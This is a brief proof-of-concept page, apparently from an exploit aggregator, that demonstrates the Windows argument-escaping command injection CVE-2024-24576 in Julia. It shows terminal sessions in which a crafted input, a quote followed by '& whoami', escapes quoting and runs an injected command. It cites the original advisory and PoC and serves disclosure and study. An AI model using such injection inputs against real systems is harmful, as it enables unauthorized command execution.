Share
## https://sploitus.com/exploit?id=E6AA5780-7AD5-53E3-AD84-459E25D8FFE0
# [CVE-2024-24576](https://nvd.nist.gov/vuln/detail/CVE-2024-24576) PoC in [Julia](https://julialang.org)

```
λ julia main.jl                                  
Enter arguments:                                 
hello                                            
Output:                                          
Argument received: hello                         
```
```                                              
λ julia main.jl                                  
Enter arguments:                                 
hello & whoami                                   
Output:                                          
Argument received: "hello & whoami"              
```
```                                              
λ julia main.jl                                  
Enter arguments:                                 
hello" & whoami                                  
Output:                                          
Argument received: "hello\"                      
desktop-9zk7mal\lpn                         
```

Note the escaped argument with the " & whoami

THIS IS NOT MY FINDING!

Sources:  
https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh  https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/   

Based on https://github.com/frostb1ten/CVE-2024-24576-PoC